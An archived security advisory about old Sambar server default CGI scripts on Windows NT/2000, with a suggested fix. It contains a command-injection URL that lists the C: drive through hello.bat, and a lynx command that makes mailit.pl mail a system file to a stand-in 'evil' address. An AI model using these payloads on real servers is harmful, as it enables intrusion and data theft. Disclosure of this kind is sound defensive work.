Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: sambar4.htm

Sambar server batch file insecurity



Vulnerability

    Sambar

Affected

    WinNT, 2000

Description

    Georgi Chorbadzhiyski found  following.  The  default installation
    of Sambar server, put  into server's /CGI-BIN/ directory  two .BAT
    files - ECHO.BAT and HELLO.BAT.  These are simple files with  just
    one "echo" command in them.  However under Windows NT these  files
    can cause a  lot of trouble.   The problem IMHO  lays in  CMD.EXE,
    the example follows:

        http://yourdomain/cgi-bin/hello.bat?&dir+c:\

    You'll see a nice  listing of your C:  drive.  Sambar server  runs
    with Administrator privileges  under NT so  even if you  use NTFS,
    you still will  be affected.   This bug was  discovered by Georich
    Chorbadzhiyski and Nikolay Tsvetkov.

    This is  not the  only problem  with default  CGI's included  with
    sambar 4.2.  Try this:

        echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl

Solution

    Sambar  server  running  on  Windows  95/98  is  _NOT_ vulnerable.
    As a solution delete any .BAT files in /CGI-BIN/ directory of your
    Sambar server.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH